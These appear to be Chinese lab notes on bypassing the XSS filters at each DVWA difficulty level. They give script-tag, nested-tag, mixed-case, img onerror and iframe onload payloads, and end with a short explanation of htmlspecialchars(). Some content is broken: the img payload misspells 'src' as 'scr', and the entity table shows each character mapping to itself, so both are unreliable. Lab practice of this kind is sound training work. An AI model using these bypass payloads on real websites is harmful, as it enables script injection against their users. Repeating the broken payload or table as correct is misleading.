Low等级
<script>alert(1)</script>
Medium 等级
过滤了<script>
嵌套绕过
<scri<script>pt>alert(1)</script>
大小写混写绕过
<scriPt>alert(1)</script>
High 等级
过滤了script标签
使用img标签弹窗
<img scr=x onerror=alert(1)>
使用iframe标签弹窗
<iframe onload=alert(1) >
Impossible 等级
htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。
& => &
“ => "
< => <
> => >
‘ => &apos(默认不编码,使用ENT_QUOTES编码)